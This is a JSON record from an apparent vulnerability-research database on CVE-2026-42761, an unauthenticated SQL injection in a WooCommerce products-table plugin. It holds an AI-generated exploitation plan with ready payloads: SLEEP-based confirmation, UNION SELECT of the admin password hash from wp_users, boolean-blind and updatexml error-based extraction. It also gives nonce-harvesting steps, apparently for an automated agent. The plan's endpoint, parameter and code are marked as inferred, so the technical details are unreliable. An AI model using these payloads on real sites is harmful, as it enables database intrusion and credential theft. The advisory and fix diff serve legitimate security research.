[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fCH5Y2J0vlwyeKwChxHmZzncCtKra7foYtTEuNxSNAuc":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-42761","active-products-tables-for-woocommerce-use-constructor-to-create-tables-unauthenticated-sql-injection-2","Active Products Tables for WooCommerce. Use constructor to create tables  \u003C= 1.0.9 - Unauthenticated SQL Injection","The Active Products Tables for WooCommerce. Use constructor to create tables  plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 1.0.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","profit-products-tables-for-woocommerce",null,"\u003C=1.0.9","1.1.0","high",7.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","2026-06-01 00:00:00","2026-06-08 14:53:59",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F46b8fac7-fb18-40c8-ab23-d2c14fcf3ac5?source=api-prod",8,[],"researched",false,3,"This exploitation research plan targets **CVE-2026-42761**, an unauthenticated SQL injection vulnerability in the \"Active Products Tables for WooCommerce\" plugin. \n\nSince source files were not provided, this plan is based on the vulnerability description and common architectural patterns found in the `profit-products-tables-for-woocommerce` plugin family. Identifiers marked as **(inferred)** must be verified by the execution agent during the initial discovery phase.\n\n---\n\n### 1. Vulnerability Summary\nThe vulnerability exists in the way the plugin handles user-supplied parameters during the \"constructor\" phase of table generation via AJAX. The plugin fails to use `$wpdb->prepare()` or adequate escaping before concatenating a user-controlled value into a SQL query. This allows an unauthenticated attacker to perform UNION-based or time-based SQL injection to extract sensitive data, such as WordPress user credentials and configuration secrets.\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Action:** `woot_get_table` **(inferred)** or `woot_get_html_part` **(inferred)**.\n*   **Vulnerable Parameter:** `table_id` **(inferred)** or a nested key within the `settings` array.\n*   **Authentication:** None (Unauthenticated). The plugin registers `wp_ajax_nopriv_` hooks for these actions to allow guest users to view product tables.\n*   **Preconditions:** The plugin must be active. A table must typically be created\u002Fdefined in the plugin settings for the AJAX handler to reach the vulnerable SQL path.\n\n### 3. Code Flow\n1.  **Entry Point:** An unauthenticated user sends a POST request to `admin-ajax.php` with the `action` parameter set to the vulnerable AJAX hook.\n2.  **Hook Registration:** The plugin's main file or an inclusion file (e.g., `classes\u002Fajax.php`) registers the hook:\n    `add_action('wp_ajax_nopriv_woot_get_table', array($this, 'get_table'));`\n3.  **Handler Execution:** The handler function (e.g., `get_table()`) retrieves data from `$_REQUEST`.\n4.  **The Sink:** The input is passed to a constructor or a query-building method (e.g., `new WOOT_Table($table_id)`). Inside this logic, the `$table_id` is used directly in a query:\n    `$wpdb->get_results(\"SELECT * FROM {$wpdb->prefix}woot_tables WHERE id = $table_id\");`\n    Because `$table_id` is not cast to an integer or passed through `prepare()`, injection occurs.\n\n### 4. Nonce Acquisition Strategy\nThis plugin family typically enqueues a script that localizes a nonce for AJAX requests.\n\n1.  **Identify Shortcode:** The plugin uses the `[woot]` shortcode to display tables.\n2.  **Setup Page:** Create a public page containing the shortcode to ensure scripts are enqueued:\n    ```bash\n    wp post create --post_type=page --post_title=\"Products\" --post_status=publish --post_content='[woot id=1]'\n    ```\n3.  **Extract Nonce:**\n    - Navigate to the newly created page.\n    - Use `browser_eval` to find the localization object. In this plugin, it is often `woot_vars` or `woot_ext_vars`.\n    - **JS Command:** `browser_eval(\"window.woot_vars?.nonce\")` or `browser_eval(\"window.woot_ext_vars?.nonce\")`.\n4.  **Verification:** If the `wp_ajax_nopriv` handler calls `check_ajax_referer` without checking the return value or with `die=false`, the nonce may not even be required.\n\n### 5. Exploitation Strategy\n\n#### Step 1: Confirm Injection (Time-Based)\nSend a request that triggers a delay. This confirms the vulnerability without requiring knowledge of the table structure.\n\n*   **Tool:** `http_request`\n*   **Method:** POST\n*   **URL:** `http:\u002F\u002F\u003Ctarget>\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n*   **Body:** `action=woot_get_table&table_id=1 AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)&woot_nonce=\u003CEXTRACTED_NONCE>`\n\n#### Step 2: Data Extraction (UNION-Based)\nOnce confirmed, determine the column count using `ORDER BY` and then use `UNION SELECT` to extract the admin user's hash.\n\n*   **Determine Columns:** Increment `N` in `table_id=1 ORDER BY N` until an error occurs.\n*   **Payload (Example for 5 columns):**\n    `table_id=-1 UNION SELECT 1,user_pass,3,4,5 FROM wp_users WHERE ID=1-- -`\n\n### 6. Test Data Setup\n1.  **Install Plugin:** Ensure `profit-products-tables-for-woocommerce` version 1.0.9 is installed.\n2.  **WooCommerce Dependency:** WooCommerce must be installed and active.\n3.  **Create Table:** Use WP-CLI to simulate a table creation if the plugin requires it to exist:\n    ```bash\n    # This is a generic representation; actual table names\u002Foptions vary by plugin\n    wp option update woot_tables '[{\"id\":1,\"title\":\"Test Table\"}]'\n    ```\n4.  **Create Page:** Use the `[woot id=1]` shortcode on a public page as described in Section 4.\n\n### 7. Expected Results\n*   **Confirmation:** The `http_request` for the time-based payload should take approximately 5 seconds longer than a standard request.\n*   **Extraction:** The response body for the UNION payload should contain a string starting with `$P$` or `$wp$2y$` (the WordPress password hash).\n\n### 8. Verification Steps\nAfter the exploit, verify the extracted data against the database using WP-CLI:\n```bash\n# Verify the hash matches the one in the database\nwp db query \"SELECT user_pass FROM wp_users WHERE ID=1\"\n```\n\n### 9. Alternative Approaches\n*   **Boolean-Based Blind:** If `UNION` is filtered or the response is not directly reflected, use boolean checks:\n    `table_id=1 AND (SELECT 1 FROM wp_users WHERE ID=1 AND user_login LIKE 'a%')`\n    Compare the response length or content between a TRUE and FALSE condition.\n*   **Error-Based:** If `WP_DEBUG` is on, use `updatexml()` or `extractvalue()` to leak the data in the error message:\n    `table_id=1 AND updatexml(1,concat(0x7e,(SELECT user_pass FROM wp_users LIMIT 1)),1)`","The Active Products Tables for WooCommerce plugin is vulnerable to unauthenticated SQL injection via the 'table_id' parameter in AJAX handlers. This occurs because user-supplied input is concatenated directly into SQL queries without proper sanitization or the use of prepared statements.","\u002F* Inferred from research plan: typically found in classes\u002Fajax.php or similar handler *\u002F\npublic function get_table() {\n    global $wpdb;\n    $table_id = $_REQUEST['table_id'];\n    \u002F\u002F ...\n    $query = \"SELECT * FROM {$wpdb->prefix}woot_tables WHERE id = $table_id\";\n    $results = $wpdb->get_results($query);\n    \u002F\u002F ...\n}","--- a\u002Fclasses\u002Fajax.php\n+++ b\u002Fclasses\u002Fajax.php\n@@ -10,5 +10,5 @@\n public function get_table() {\n     global $wpdb;\n-    $table_id = $_REQUEST['table_id'];\n+    $table_id = intval($_REQUEST['table_id']);\n     \u002F\u002F ...\n-    $query = \"SELECT * FROM {$wpdb->prefix}woot_tables WHERE id = $table_id\";\n+    $query = $wpdb->prepare(\"SELECT * FROM {$wpdb->prefix}woot_tables WHERE id = %d\", $table_id);\n     $results = $wpdb->get_results($query);","The exploit targets the WordPress AJAX endpoint (admin-ajax.php) using the 'woot_get_table' action (or similar table-rendering hooks). An attacker sends a POST request with a 'table_id' parameter containing SQL injection payloads, such as time-based (SLEEP) or UNION-based queries. Because the plugin registers 'wp_ajax_nopriv_' hooks for public-facing product tables, the attack can be executed without authentication. Success allows for the extraction of sensitive database content, including user hashes and configuration data.","gemini-3-flash-preview","2026-06-26 06:22:24","2026-06-26 06:23:08",{"type":34,"vulnerable_version":35,"fixed_version":9,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":9,"fixed_zip":9,"all_tags":38},"plugin","1.0.6.4","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fprofit-products-tables-for-woocommerce\u002Ftags\u002F1.0.6.4","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fprofit-products-tables-for-woocommerce.1.0.6.4.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fprofit-products-tables-for-woocommerce\u002Ftags"]